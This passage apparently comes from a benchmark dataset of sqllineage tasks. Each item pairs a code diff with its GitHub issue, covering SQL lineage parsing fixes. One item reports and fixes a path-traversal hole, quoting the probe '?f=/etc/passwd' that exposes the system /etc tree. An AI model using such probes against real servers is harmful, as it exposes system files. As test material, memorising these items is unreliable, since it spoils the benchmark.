return sqls
- def analyze(self, sql: str) -> StatementLineageHolder:
+ def analyze(self, sql: str, silent_mode: bool = False) -> StatementLineageHolder:
if sql in self.tsql_split_cache:
statement_segments = [self.tsql_split_cache[sql]]
else:
@@ -56,10 +56,17 @@ def analyze(self, sql: str) -> StatementLineageHolder:
)
return StatementLineageHolder.of(lineage_holder)
else:
- raise UnsupportedStatementException(
- f"SQLLineage doesn't support analyzing statement type [{statement_segment.type}] for SQL:"
- f"{sql}"
- )
+ if silent_mode:
+ warnings.warn(
+ f"SQLLineage doesn't support analyzing statement type [{statement_segment.type}] for SQL:"
+ f"{sql}"
+ )
+ return StatementLineageHolder()
+ else:
+ raise UnsupportedStatementException(
+ f"SQLLineage doesn't support analyzing statement type [{statement_segment.type}] for SQL:"
+ f"{sql}"
+ )
def _list_specific_statement_segment(self, sql: str):
parsed = Linter(dialect=self._dialect).parse_string(sql)
diff --git a/sqllineage/core/parser/sqlparse/analyzer.py b/sqllineage/core/parser/sqlparse/analyzer.py
index 13095f12..ede14f69 100644
--- a/sqllineage/core/parser/sqlparse/analyzer.py
+++ b/sqllineage/core/parser/sqlparse/analyzer.py
@@ -38,7 +38,7 @@ class SqlParseLineageAnalyzer(LineageAnalyzer):
PARSER_NAME = "sqlparse"
SUPPORTED_DIALECTS = ["non-validating"]
- def analyze(self, sql: str) -> StatementLineageHolder:
+ def analyze(self, sql: str, silent_mode: bool = False) -> StatementLineageHolder:
# get rid of comments, which cause inconsistencies in sqlparse output
stmt = sqlparse.parse(trim_comment(sql))[0]
if (
diff --git a/sqllineage/runner.py b/sqllineage/runner.py
index e65bce60..e90af884 100644
--- a/sqllineage/runner.py
+++ b/sqllineage/runner.py
@@ -41,6 +41,7 @@ def __init__(
metadata_provider: MetaDataProvider = DummyMetaDataProvider(),
encoding: Optional[str] = None,
verbose: bool = False,
+ silent_mode: bool = False,
draw_options: Optional[Dict[str, str]] = None,
):
"""
@@ -68,6 +69,7 @@ def __init__(
self._stmt: List[str] = []
self._dialect = dialect
self._metadata_provider = metadata_provider
+ self._silent_mode = silent_mode
@lazy_method
def __str__(self):
@@ -190,7 +192,9 @@ def _eval(self):
)
self._stmt = split(self._sql.strip())
- self._stmt_holders = [analyzer.analyze(stmt) for stmt in self._stmt]
+ self._stmt_holders = [
+ analyzer.analyze(stmt, self._silent_mode) for stmt in self._stmt
+ ]
self._sql_holder = SQLLineageHolder.of(
self._metadata_provider, *self._stmt_holders
)
| Silent Mode Option to Suppress UnsupportedStatementException
Currently when using any dialect other than non-validating, namely sqlfluff parse implementation, SQLLineage needs to know the statement type before analyzing it.
For example, SelectExtractor supports statement type of `["select_statement", "set_expression", "bracketed"]`. And we have a special-purpose NoopExtractor to whitelist a bunch of statement types where no lineage can be extracted.
This whitelist approach solves a problem from non-validating dialect, where we don't know what statement we support. And when user reports a exception, it's hard to tell whether it's a bug or feature.
However, this comes at cost that for statement type we haven't included in the whitelist an UnsupportedStatementException will be thrown. Catch the exception is one way.
In this proposal we'd also like to introduce a new silent_mode option to throw warnings instead of exception.
| 2023-12-20T08:02:35 | 0.0 | [] | [] |
|||
reata/sqllineage | reata__sqllineage-503 | fe3e2c5ba1d6d6af2a64a29b4980a97a8d5c83b7 | diff --git a/sqllineage/utils/helpers.py b/sqllineage/utils/helpers.py
index 21f0a268..e403ba79 100644
--- a/sqllineage/utils/helpers.py
+++ b/sqllineage/utils/helpers.py
@@ -45,9 +45,18 @@ def extract_sql_from_args(args: Namespace) -> str:
def split(sql: str) -> List[str]:
# TODO: we need a parser independent split function
import sqlparse
+ from sqlparse.tokens import Punctuation
- # sometimes sqlparse split out a statement that is comment only, we want to exclude that
- return [s.value for s in sqlparse.parse(sql) if s.token_first(skip_cm=True)]
+ result = []
+ for s in sqlparse.parse(sql):
+ if first_token := s.token_first(skip_cm=True):
+ # sometimes sqlparse split out a statement that is comment only or semicolon only, we want to exclude that
+ if first_token.ttype == Punctuation and first_token.value == ";":
+ # exclude semicolon only statement
+ continue
+ else:
+ result.append(s.value)
+ return result
def trim_comment(sql: str) -> str:
| InvalidSyntaxException When SQL Statement Ends with Multiple Semicolons
**Describe the bug**
When a SQL statement ends with multiple semicolons, it will be split to several statements with all of them other than the first one contain a semicolon only. And those semicolon only statement triggers InvalidSyntaxException
**SQL**
Paste the SQL text here. For example:
```sql
SELECT * FROM DUAL;;
```
**To Reproduce**
```shell
sqllineage -f test.sql --dialect=ansi
```
```
Traceback (most recent call last):
File "/home/hujunwei/.pyenv/versions/3.12.0/bin/sqllineage", line 8, in <module>
sys.exit(main())
^^^^^^
File "/home/hujunwei/.pyenv/versions/3.12.0/lib/python3.12/site-packages/sqllineage/cli.py", line 109, in main
runner.print_table_lineage()
File "/home/hujunwei/.pyenv/versions/3.12.0/lib/python3.12/site-packages/sqllineage/runner.py", line 176, in print_table_lineage
print(str(self))
^^^^^^^^^
File "/home/hujunwei/.pyenv/versions/3.12.0/lib/python3.12/site-packages/sqllineage/runner.py", line 26, in wrapper
self._eval()
File "/home/hujunwei/.pyenv/versions/3.12.0/lib/python3.12/site-packages/sqllineage/runner.py", line 193, in _eval
self._stmt_holders = [analyzer.analyze(stmt) for stmt in self._stmt]
^^^^^^^^^^^^^^^^^^^^^^
File "/home/hujunwei/.pyenv/versions/3.12.0/lib/python3.12/site-packages/sqllineage/core/parser/sqlfluff/analyzer.py", line 42, in analyze
statement_segments = self._list_specific_statement_segment(sql)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/hujunwei/.pyenv/versions/3.12.0/lib/python3.12/site-packages/sqllineage/core/parser/sqlfluff/analyzer.py", line 73, in _list_specific_statement_segment
raise InvalidSyntaxException(
sqllineage.exceptions.InvalidSyntaxException: This SQL statement is unparsable, please check potential syntax error for SQL:
;
Line 1, Position 1: Found unparsable section: ';'
```
**Expected behavior**
No exception thrown.
**Python version (available via `python --version`)**
- 3.12.0
**SQLLineage version (available via `sqllineage --version`):**
- 1.4.9
| 2023-12-11T13:16:04 | 0.0 | [] | [] |
|||
reata/sqllineage | reata__sqllineage-494 | a2b03449ab6d8722eeb3cd9869d89a2af1b7c098 | diff --git a/sqllineage/core/parser/sqlfluff/extractors/base.py b/sqllineage/core/parser/sqlfluff/extractors/base.py
index 74ad8bc6..86c9a535 100644
--- a/sqllineage/core/parser/sqlfluff/extractors/base.py
+++ b/sqllineage/core/parser/sqlfluff/extractors/base.py
@@ -101,6 +101,25 @@ def delegate_to(
"""
return extractor_cls(self.dialect).extract(segment, context)
+ def extract_subquery(
+ self, subqueries: List[SubQuery], holder: SubQueryLineageHolder
+ ):
+ """
+ extract subqueries collected from statement-level segment
+ """
+ from .cte import CteExtractor
+ from .select import SelectExtractor
+
+ for sq in subqueries:
+ extractor_cls = (
+ CteExtractor
+ if sq.query.get_child("with_compound_statement")
+ else SelectExtractor
+ )
+ holder |= extractor_cls(self.dialect).extract(
+ sq.query, AnalyzerContext(cte=holder.cte, write={sq})
+ )
+
@staticmethod
def _init_holder(context: AnalyzerContext) -> SubQueryLineageHolder:
"""
diff --git a/sqllineage/core/parser/sqlfluff/extractors/cte.py b/sqllineage/core/parser/sqlfluff/extractors/cte.py
index 0427a3b0..4356dcd3 100644
--- a/sqllineage/core/parser/sqlfluff/extractors/cte.py
+++ b/sqllineage/core/parser/sqlfluff/extractors/cte.py
@@ -59,11 +59,6 @@ def extract(
if segment_has_alias:
holder.add_cte(SqlFluffSubQuery.of(sub_segment, identifier))
- # By recursively extracting each extractor of the parent and merge, we're doing Depth-first search
- for sq in subqueries:
- holder |= SelectExtractor(self.dialect).extract(
- sq.query,
- AnalyzerContext(cte=holder.cte, write={sq}),
- )
+ self.extract_subquery(subqueries, holder)
return holder
diff --git a/sqllineage/core/parser/sqlfluff/extractors/select.py b/sqllineage/core/parser/sqlfluff/extractors/select.py
index 5c9fe72f..24dcc613 100644
--- a/sqllineage/core/parser/sqlfluff/extractors/select.py
+++ b/sqllineage/core/parser/sqlfluff/extractors/select.py
@@ -70,21 +70,9 @@ def extract(
subqueries.append(sq)
self._handle_table(seg, holder)
self._handle_column(seg)
-
self.end_of_query_cleanup(holder)
- # By recursively extracting each subquery of the parent and merge, we're doing Depth-first search
- for sq in subqueries:
- from .cte import CteExtractor
-
- extractor_cls = (
- CteExtractor
- if sq.query.get_child("with_compound_statement")
- else SelectExtractor
- )
- holder |= extractor_cls(self.dialect).extract(
- sq.query, AnalyzerContext(cte=holder.cte, write={sq})
- )
+ self.extract_subquery(subqueries, holder)
return holder
| CTE (Common Table Expressions) within CTE
**Hope to support CTE (Common Table Expressions) in subqueries. Thank you.**
```sql
insert into
public.tgt_tbl1
(
id
)
with
t1 as
(
with
t2 as
(
select
id
from
public.src_tbl1
)
select
id
from
t2
)
select
id
from
t1
;
```
| https://github.com/reata/sqllineage/issues/476
This potentially will be solved when we solve #476 and #481. Mark it as duplicate and keep it open for now.
#476 (CTE within subquery) is now fixed. But looks like here we have CTE within CTE and they're not handled in a unified way. We still need to fix this issue separately. | 2023-12-10T02:47:40 | 0.0 | [] | [] |
||
reata/sqllineage | reata__sqllineage-493 | 843ab2eb58e3e8f4d68c5e67afc7f69341c3ade7 | diff --git a/sqllineage/core/parser/sqlfluff/extractors/select.py b/sqllineage/core/parser/sqlfluff/extractors/select.py
index 72c1eda3..5c9fe72f 100644
--- a/sqllineage/core/parser/sqlfluff/extractors/select.py
+++ b/sqllineage/core/parser/sqlfluff/extractors/select.py
@@ -75,7 +75,14 @@ def extract(
# By recursively extracting each subquery of the parent and merge, we're doing Depth-first search
for sq in subqueries:
- holder |= SelectExtractor(self.dialect).extract(
+ from .cte import CteExtractor
+
+ extractor_cls = (
+ CteExtractor
+ if sq.query.get_child("with_compound_statement")
+ else SelectExtractor
+ )
+ holder |= extractor_cls(self.dialect).extract(
sq.query, AnalyzerContext(cte=holder.cte, write={sq})
)
diff --git a/sqllineage/core/parser/sqlfluff/utils.py b/sqllineage/core/parser/sqlfluff/utils.py
index b17c29c4..406b17de 100644
--- a/sqllineage/core/parser/sqlfluff/utils.py
+++ b/sqllineage/core/parser/sqlfluff/utils.py
@@ -36,7 +36,9 @@ def is_subquery(segment: BaseSegment) -> bool:
segment if segment.type == "bracketed" else segment.segments[0]
)
# check if innermost parenthesis contains SELECT
- if token.get_child("select_statement", "set_expression"):
+ if token.get_child(
+ "select_statement", "set_expression", "with_compound_statement"
+ ):
return True
elif expression := token.get_child("expression"):
if expression.get_child("select_statement"):
@@ -152,7 +154,6 @@ def list_subqueries(segment: BaseSegment) -> List[SubQueryTuple]:
elif segment.type == "from_expression_element":
as_segment, target = extract_as_and_target_segment(segment)
if is_subquery(target):
- as_segment, target = extract_as_and_target_segment(segment)
subquery = [
SubQueryTuple(
extract_innermost_bracketed(target)
| lineage inaccurate when CTE used in subquery
```
>>> from sqllineage.runner import LineageRunner
>>> sql_1="""
... with unique_nicknames as (select nickname from nicknames group by nickname having count(distinct name) = 1)
... select name, min(replacements) as smallest_step, max(replacements) as largest_step from (
... select names.fname, [nicknames.name](http://nicknames.name/), count(*) as replacements from unique_nicknames join nicknames on nicknames.nickname = unique_nicknames.nickname join names on names.fname = nicknames.nickname group by names.fname, [nicknames.name](http://nicknames.name/)
... ) as replaceable group by name
... """
>>> sql_2="""
... select name, min(replacements) as smallest_step, max(replacements) as largest_step from (
... with unique_nicknames as (select nickname from nicknames group by nickname having count(distinct name) = 1)
... select names.fname, [nicknames.name](http://nicknames.name/), count(*) as replacements from unique_nicknames join nicknames on nicknames.nickname = unique_nicknames.nickname join names on names.fname = nicknames.nickname group by names.fname, [nicknames.name](http://nicknames.name/)
... ) as replaceable group by name
... """
>>> LineageRunner(sql=sql_1,dialect="redshift").source_tables
[Table: <default>.names, Table: <default>.nicknames]
>>> LineageRunner(sql=sql_2,dialect="redshift").source_tables
[Table: <default>.nicknames]
>>>
```
| Is this the SQL you're using?
```sql
with unique_nicknames as (select nickname from nicknames group by nickname having count(distinct name) = 1)
select name, min(replacements) as smallest_step, max(replacements) as largest_step from (
select names.fname, nicknames.name, count(*) as replacements from unique_nicknames join nicknames on nicknames.nickname = unique_nicknames.nickname join names on names.fname = nicknames.nickname group by names.fname, nicknames.name
) as replaceable group by name;
select name, min(replacements) as smallest_step, max(replacements) as largest_step from (
with unique_nicknames as (select nickname from nicknames group by nickname having count(distinct name) = 1)
select names.fname, nicknames.name, count(*) as replacements from unique_nicknames join nicknames on nicknames.nickname = unique_nicknames.nickname join names on names.fname = nicknames.nickname group by names.fname, nicknames.name
) as replaceable group by name;
```
Because I see markdown syntax like `[nicknames.name](http://nicknames.name/)` in your sql text and it won't parse.
If the SQL is as I pasted above, I can confirm this is a bug and ansi also suffers from the same issue. Looks like we are not handling CTE within subquery. | 2023-12-09T14:41:19 | 0.0 | [] | [] |
||
reata/sqllineage | reata__sqllineage-492 | 2d912648c14f7010b34026d5a0b1ae53dfe49d9c | diff --git a/sqllineage/core/parser/sqlfluff/extractors/create_insert.py b/sqllineage/core/parser/sqlfluff/extractors/create_insert.py
index 563851a2..526d7261 100644
--- a/sqllineage/core/parser/sqlfluff/extractors/create_insert.py
+++ b/sqllineage/core/parser/sqlfluff/extractors/create_insert.py
@@ -122,7 +122,11 @@ def delegate_to_cte(
from .cte import CteExtractor
return self.delegate_to(
- CteExtractor, segment, AnalyzerContext(cte=holder.cte, write=holder.write)
+ CteExtractor,
+ segment,
+ AnalyzerContext(
+ cte=holder.cte, write=holder.write, write_columns=holder.write_columns
+ ),
)
def delegate_to_select(
diff --git a/sqllineage/core/parser/sqlfluff/extractors/cte.py b/sqllineage/core/parser/sqlfluff/extractors/cte.py
index f05732dc..0427a3b0 100644
--- a/sqllineage/core/parser/sqlfluff/extractors/cte.py
+++ b/sqllineage/core/parser/sqlfluff/extractors/cte.py
@@ -30,7 +30,11 @@ def extract(
holder |= self.delegate_to(
SelectExtractor,
segment,
- AnalyzerContext(cte=holder.cte, write=holder.write),
+ AnalyzerContext(
+ cte=holder.cte,
+ write=holder.write,
+ write_columns=holder.write_columns,
+ ),
)
elif segment.type == "insert_statement":
holder |= self.delegate_to(
| Not Using Column Name Specified in Query For CTE within Query
**Describe the bug**
* When the column names in the target table are different from those in the source table, the column lineage is incorrect.
**SQL**
Paste the SQL text here. For example:
```sql
insert into
public.tgt_tbl1
(
id
)
with
cte1 as (
select name from public.src_tbl1
)
select
name
from
cte1
;
```
**To Reproduce**
*Note here we refer to SQL provided in prior step as stored in a file named `test.sql`*
```python
with open(sql_file, 'r') as f:
sql = f.read()
lr = LineageRunner(sql, dialect='redshift')
lr.print_column_lineage()
```
```
public.tgt_tbl1.name <- cte1.name <- public.src_tbl1.name
```
**Expected behavior**
```
public.tgt_tbl1.id <- cte1.name <- public.src_tbl1.name
```
**Python version (available via `python --version`)**
- 3.11.5
**SQLLineage version (available via `sqllineage --version`):**
- 1.4.8
| Bug confirmed. Thanks for reporting. | 2023-12-09T13:41:32 | 0.0 | [] | [] |
||
reata/sqllineage | reata__sqllineage-439 | a896a5ab20ce3540afe4e035310fef5b68b8f788 | diff --git a/sqllineage/drawing.py b/sqllineage/drawing.py
index 0b2599b6..4c6bf1a9 100644
--- a/sqllineage/drawing.py
+++ b/sqllineage/drawing.py
@@ -34,6 +34,7 @@
class SQLLineageApp:
def __init__(self) -> None:
self.routes: Dict[str, Callable[[Dict[str, Any]], Dict[str, Any]]] = {}
+ self.root_path = Path(DATA_FOLDER)
def route(self, path: str):
def wrapper(handler):
@@ -74,6 +75,11 @@ def __call__(self, environ, start_response) -> List[bytes]:
request_body_size = int(environ["CONTENT_LENGTH"])
request_body = environ["wsgi.input"].read(request_body_size)
payload = json.loads(request_body)
+ for param in ["d", "f"]:
+ if param in payload and not str(
+ Path(payload[param]).absolute()
+ ).startswith(str(Path(self.root_path).absolute())):
+ return self.handle_403(start_response)
data = self.routes[path_info](payload)
return self.handle_200_json(start_response, data)
else:
@@ -117,6 +123,12 @@ def handle_400(self, start_response, message) -> List[bytes]:
start_response, HTTPStatus.BAD_REQUEST, message
)
+ def handle_403(self, start_response) -> List[bytes]:
+ message = "File Not Allowed For Accessing"
+ return self.handle_client_error_response(
+ start_response, HTTPStatus.FORBIDDEN, message
+ )
+
def handle_404(self, start_response) -> List[bytes]:
message = "File Not Found"
return self.handle_client_error_response(
@@ -199,6 +211,8 @@ def draw_lineage_graph(**kwargs) -> None:
port = kwargs.pop("port", DEFAULT_PORT)
querystring = urlencode({k: v for k, v in kwargs.items() if v})
path = f"/?{querystring}" if querystring else "/"
+ if "f" in kwargs:
+ app.root_path = Path(kwargs["f"]).parent
with make_server(host, port, app) as httpd:
print(f" * SQLLineage Running on http://{host}:{port}{path}")
httpd.serve_forever()
| Restricting folder and files user can access from frontend
https://reata.github.io/sqllineage/?f=/etc/passwd should not display the whole /etc tree. Contents are not displayed, however :)
Looks a bit like a security issue
| Just seeing /etc/passwd is already kind of scary  ̄︶ ̄
We should definitely limit the f parameter to be subfolder of SQLLINEAGE_DIRECTORY. Thanks for reporting this.
No problem. You also should ban using .. in the path, just to avoid path traversal completely | 2023-08-27T12:05:22 | 0.0 | [] | [] |
||
reata/sqllineage | reata__sqllineage-438 | a5ac784cbd3051fcba373a9434ac918a729dbf69 | diff --git a/sqllineage/core/parser/sqlfluff/extractors/create_insert.py b/sqllineage/core/parser/sqlfluff/extractors/create_insert.py
index 1a9b8580..23f0eaf6 100644
--- a/sqllineage/core/parser/sqlfluff/extractors/create_insert.py
+++ b/sqllineage/core/parser/sqlfluff/extractors/create_insert.py
@@ -7,6 +7,7 @@
from sqllineage.core.parser.sqlfluff.models import SqlFluffColumn, SqlFluffTable
from sqllineage.core.parser.sqlfluff.utils import (
get_child,
+ get_children,
is_set_expression,
list_child_segments,
)
@@ -45,6 +46,17 @@ def extract(
holder |= self.delegate_to_cte(segment, holder)
elif segment.type in ("select_statement", "set_expression"):
holder |= self.delegate_to_select(segment, holder)
+ elif segment.type == "values_clause":
+ for bracketed in get_children(segment, "bracketed"):
+ for expression in get_children(bracketed, "expression"):
+ if sub_bracketed := get_child(expression, "bracketed"):
+ if sub_expression := get_child(sub_bracketed, "expression"):
+ if select_statement := get_child(
+ sub_expression, "select_statement"
+ ):
+ holder |= self.delegate_to_select(
+ select_statement, holder
+ )
elif segment.type == "bracketed" and (
self.list_subquery(segment) or is_set_expression(segment)
):
diff --git a/sqllineage/core/parser/sqlparse/analyzer.py b/sqllineage/core/parser/sqlparse/analyzer.py
index 8845810c..46d915dc 100644
--- a/sqllineage/core/parser/sqlparse/analyzer.py
+++ b/sqllineage/core/parser/sqlparse/analyzer.py
@@ -237,7 +237,7 @@ def _extract_from_dml(
@classmethod
def parse_subquery(cls, token: TokenList) -> List[SubQuery]:
result = []
- if isinstance(token, (Identifier, Function, Where)):
+ if isinstance(token, (Identifier, Function, Where, Values)):
# usually SubQuery is an Identifier, but not all Identifiers are SubQuery
# Function for CTE without AS keyword
result = cls._parse_subquery(token)
diff --git a/sqllineage/core/parser/sqlparse/utils.py b/sqllineage/core/parser/sqlparse/utils.py
index 2a397a94..312dafef 100644
--- a/sqllineage/core/parser/sqlparse/utils.py
+++ b/sqllineage/core/parser/sqlparse/utils.py
@@ -10,6 +10,7 @@
Identifier,
Parenthesis,
TokenList,
+ Values,
Where,
)
from sqlparse.tokens import DML, Keyword, Name, Wildcard
@@ -99,7 +100,7 @@ def is_values_clause(token: Parenthesis) -> bool:
def get_subquery_parentheses(
- token: Union[Identifier, Function, Where]
+ token: Union[Identifier, Function, Values, Where]
) -> List[SubQueryTuple]:
"""
Retrieve subquery list
@@ -115,7 +116,7 @@ def get_subquery_parentheses(
if isinstance(token, Function):
# CTE without AS: tbl (SELECT 1)
target = token.tokens[-1]
- elif isinstance(token, Where):
+ elif isinstance(token, (Values, Where)):
# WHERE col1 IN (SELECT max(col1) FROM tab2)
target = token
else:
@@ -131,6 +132,11 @@ def get_subquery_parentheses(
subquery.append(SubQueryTuple(tk.right, tk.right.get_real_name()))
elif is_subquery(tk):
subquery.append(SubQueryTuple(tk, token.get_real_name()))
+ elif isinstance(target, Values):
+ for row in target.get_sublists():
+ for col in row:
+ if is_subquery(col):
+ subquery.append(SubQueryTuple(col, col.get_real_name()))
elif is_subquery(target):
target = remove_parenthesis_between_union(target)
subquery = [
| Support subquery in VALUES clause
from sqllineage.runner import LineageRunner
veryfy_sql= "INSERT INTO taba (a1, b1) VALUES (1,(SELECT max(bb) FROM tabb ));"
analysis_result = LineageRunner(sql=veryfy_sql, dialect="ansi")
logging.info(f'source_tables: {analysis_result.source_tables}')
as mentioned above,sourcetables is empty,is this need to be fixed?
| sqllineage version is 1.4.5
This is the first time I saw a SQL with subquery in VALUES clause. Never even imagine this is allowed. So it's only natural that we don't have analyzing logic targeting this. We can add support for it. This should be an easy one.
By the way, can you share the actual SQL dialect/database that you're running this SQL with?
您好,邮件已收到,祝您天天好心情! | 2023-08-27T06:54:26 | 0.0 | [] | [] |
||
reata/sqllineage | reata__sqllineage-430 | bff222cec7aa2523a5f98ad45dadffae772b0760 | diff --git a/sqllineage/core/parser/sqlfluff/extractors/dml_merge_extractor.py b/sqllineage/core/parser/sqlfluff/extractors/dml_merge_extractor.py
index 2495c829..89bbba80 100644
--- a/sqllineage/core/parser/sqlfluff/extractors/dml_merge_extractor.py
+++ b/sqllineage/core/parser/sqlfluff/extractors/dml_merge_extractor.py
@@ -13,6 +13,7 @@
)
from sqllineage.core.parser.sqlfluff.models import SqlFluffSubQuery, SqlFluffTable
from sqllineage.core.parser.sqlfluff.utils import (
+ extract_column_qualifier,
extract_identifier,
extract_innermost_bracketed,
get_child,
@@ -93,11 +94,15 @@ def extract(
for set_clause in get_children(set_clause_list, "set_clause"):
columns = get_children(set_clause, "column_reference")
if len(columns) == 2:
- src_col = Column(extract_identifier(columns[1]))
- src_col.parent = direct_source
- tgt_col = Column(extract_identifier(columns[0]))
- tgt_col.parent = list(holder.write)[0]
- holder.add_column_lineage(src_col, tgt_col)
+ src_col = tgt_col = None
+ if src_cqt := extract_column_qualifier(columns[1]):
+ src_col = Column(src_cqt.column)
+ src_col.parent = direct_source
+ if tgt_cqt := extract_column_qualifier(columns[0]):
+ tgt_col = Column(tgt_cqt.column)
+ tgt_col.parent = list(holder.write)[0]
+ if src_col is not None and tgt_col is not None:
+ holder.add_column_lineage(src_col, tgt_col)
for merge_when_not_matched_clause in get_children(
merge_match, "merge_when_not_matched_clause"
):
@@ -107,20 +112,22 @@ def extract(
insert_columns = []
if bracketed := get_child(merge_insert, "bracketed"):
for column_reference in get_children(bracketed, "column_reference"):
- tgt_col = Column(extract_identifier(column_reference))
- tgt_col.parent = list(holder.write)[0]
- insert_columns.append(tgt_col)
+ if cqt := extract_column_qualifier(column_reference):
+ tgt_col = Column(cqt.column)
+ tgt_col.parent = list(holder.write)[0]
+ insert_columns.append(tgt_col)
if values_clause := get_child(merge_insert, "values_clause"):
if bracketed := get_child(values_clause, "bracketed"):
for j, e in enumerate(
get_children(bracketed, "literal", "expression")
):
if column_reference := get_child(e, "column_reference"):
- src_col = Column(
- extract_identifier(column_reference)
- )
- src_col.parent = direct_source
- holder.add_column_lineage(
- src_col, insert_columns[j]
- )
+ if cqt := extract_column_qualifier(
+ column_reference
+ ):
+ src_col = Column(cqt.column)
+ src_col.parent = direct_source
+ holder.add_column_lineage(
+ src_col, insert_columns[j]
+ )
return holder
diff --git a/sqllineage/core/parser/sqlfluff/models.py b/sqllineage/core/parser/sqlfluff/models.py
index 10fb704a..6c603092 100644
--- a/sqllineage/core/parser/sqlfluff/models.py
+++ b/sqllineage/core/parser/sqlfluff/models.py
@@ -6,6 +6,7 @@
from sqllineage import SQLPARSE_DIALECT
from sqllineage.core.models import Column, Schema, SubQuery, Table
from sqllineage.core.parser.sqlfluff.utils import (
+ extract_column_qualifier,
extract_identifier,
is_subquery,
is_wildcard,
@@ -111,8 +112,11 @@ def of(column: BaseSegment, **kwargs) -> Column:
if source_columns:
column_name = None
for sub_segment in list_child_segments(column):
- if sub_segment.type == "column_reference":
- column_name = extract_identifier(sub_segment)
+ if sub_segment.type == "column_reference" or is_wildcard(
+ sub_segment
+ ):
+ if cqt := extract_column_qualifier(sub_segment):
+ column_name = cqt.column
elif sub_segment.type == "expression":
# special handling for postgres style type cast, col as target column name instead of col::type
if len(sub2_segments := list_child_segments(sub_segment)) == 1:
@@ -130,7 +134,10 @@ def of(column: BaseSegment, **kwargs) -> Column:
if (
sub3_segment := sub3_segments[0]
).type == "column_reference":
- column_name = extract_identifier(sub3_segment)
+ if cqt := extract_column_qualifier(
+ sub3_segment
+ ):
+ column_name = cqt.column
return Column(
column.raw if column_name is None else column_name,
source_columns=source_columns,
@@ -149,12 +156,11 @@ def _extract_source_columns(segment: BaseSegment) -> List[ColumnQualifierTuple]:
:param segment: segment to be processed
:return: list of extracted source columns
"""
- if segment.type == "identifier" or is_wildcard(segment):
- return [ColumnQualifierTuple(segment.raw, None)]
- if segment.type == "column_reference":
- parent, column = SqlFluffColumn._get_column_and_parent(segment)
- return [ColumnQualifierTuple(column, parent)]
- if segment.type in NON_IDENTIFIER_OR_COLUMN_SEGMENT_TYPE:
+ col_list = []
+ if segment.type in ("identifier", "column_reference") or is_wildcard(segment):
+ if cqt := extract_column_qualifier(segment):
+ col_list = [cqt]
+ elif segment.type in NON_IDENTIFIER_OR_COLUMN_SEGMENT_TYPE:
sub_segments = list_child_segments(segment)
col_list = []
for sub_segment in sub_segments:
@@ -172,8 +178,7 @@ def _extract_source_columns(segment: BaseSegment) -> List[ColumnQualifierTuple]:
):
res = SqlFluffColumn._extract_source_columns(sub_segment)
col_list.extend(res)
- return col_list
- return []
+ return col_list
@staticmethod
def _get_column_from_subquery(
@@ -229,12 +234,4 @@ def _get_column_and_alias(
):
res = SqlFluffColumn._extract_source_columns(sub_segment)
columns += res if res else []
-
return columns, alias
-
- @staticmethod
- def _get_column_and_parent(col_segment: BaseSegment) -> Tuple[Optional[str], str]:
- identifiers = list_child_segments(col_segment)
- if len(identifiers) > 1:
- return identifiers[-2].raw, identifiers[-1].raw
- return None, identifiers[-1].raw
diff --git a/sqllineage/core/parser/sqlfluff/utils.py b/sqllineage/core/parser/sqlfluff/utils.py
index 0697bc11..8957494c 100644
--- a/sqllineage/core/parser/sqlfluff/utils.py
+++ b/sqllineage/core/parser/sqlfluff/utils.py
@@ -12,7 +12,7 @@
from sqlfluff.core.parser import BaseSegment
-from sqllineage.utils.entities import SubQueryTuple
+from sqllineage.utils.entities import ColumnQualifierTuple, SubQueryTuple
def is_negligible(segment: BaseSegment) -> bool:
@@ -228,6 +228,23 @@ def extract_as_and_target_segment(
return as_segment, target
+def extract_column_qualifier(segment: BaseSegment) -> Optional[ColumnQualifierTuple]:
+ cqt = None
+ if is_wildcard(segment):
+ identifiers = segment.raw.split(".")
+ column = identifiers[-1]
+ parent = identifiers[-2] if len(identifiers) > 1 else None
+ cqt = ColumnQualifierTuple(column, parent)
+ elif segment.type == "column_reference":
+ sub_segments = list_child_segments(segment)
+ column = sub_segments[-1].raw
+ parent = sub_segments[-2].raw if len(sub_segments) > 1 else None
+ cqt = ColumnQualifierTuple(column, parent)
+ elif segment.type == "identifier":
+ cqt = ColumnQualifierTuple(segment.raw, None)
+ return cqt
+
+
def extract_innermost_bracketed(bracketed_segment: BaseSegment) -> BaseSegment:
# in case of subquery in nested parenthesis like: `SELECT * FROM ((table))`, find the innermost one first
while True:
| qualified wildcard recognized as wrong column name
The following SQL query uses "sales" as an alias for "T_SALES". How could I ask the `LineageRunner()` to return the table/view name rather than the alias?
```sql
-- sample_query_with_semicolons.sql
SELECT CUST_ID, CUST_NAME, CUST_CITY, CUST_COUNTRY
INTO #TEMP_CUSTOMERS
FROM T_CUSTOMERS
WHERE CUST_COUNTRY = 'USA';
SELECT CUST.*
, SALES.CUM_SALES
INTO #TEMP_FINAL_RESULTS
FROM #TEMP_CUSTOMERS AS CUST
LEFT JOIN T_SALES AS SALES
ON CUST.CUST_ID = SALES.CUST_ID
WHERE SALES.CUST_ID IS NULL;
SELECT *
FROM #TEMP_FINAL_RESULTS;
```
```python
from sqllineage.runner import LineageRunner
import csv
import pandas as pd
# read text from sample_query.sql
sql_script = open('sample_query_with_semicolons.sql', 'r').read()
# parse sql_script with LineageRunner
parsed_results = LineageRunner(sql_script, dialect="tsql")
# write parsed_results to data frame
df = pd.DataFrame(parsed_results.get_column_lineage())
df.columns = ['Source', 'Target']
print(df)
```
Expected output:
Source | Target
---|---
`<default>.t_customers.cust_city` | `<default>.#temp_customers.cust_city`
`<default>.t_customers.cust_country` | `<default>.#temp_customers.cust_country`
`<default>.t_customers.cust_id` | `<default>.#temp_customers.cust_id`
`<default>.t_customers.cust_name` | `<default>.#temp_customers.cust_name`
`<default>.`**t_sales.cum_sales** | `<default>.#temp_final_results.cum_sales`
`<default>.#temp_customers.cust.*` | `<default>.#temp_final_results.cust.*`
Actual output:
Source | Target
---|---
`<default>.t_customers.cust_city` | `<default>.#temp_customers.cust_city`
`<default>.t_customers.cust_country` | `<default>.#temp_customers.cust_country`
`<default>.t_customers.cust_id` | `<default>.#temp_customers.cust_id`
`<default>.t_customers.cust_name` | `<default>.#temp_customers.cust_name`
`<default>.sales.cum_sales` | `<default>.#temp_final_results.cum_sales`
`<default>.#temp_customers.cust.*` | `<default>.#temp_final_results.cust.*`
| Thanks for reporting this. I can confirm this is a bug we should fix.
I found the problem is with the second statement:
```sql
FROM #TEMP_CUSTOMERS CUST AS CUST
```
@crossxwill Can you help confirm this is valid syntax instead of
```sql
FROM #TEMP_CUSTOMERS AS CUST
```
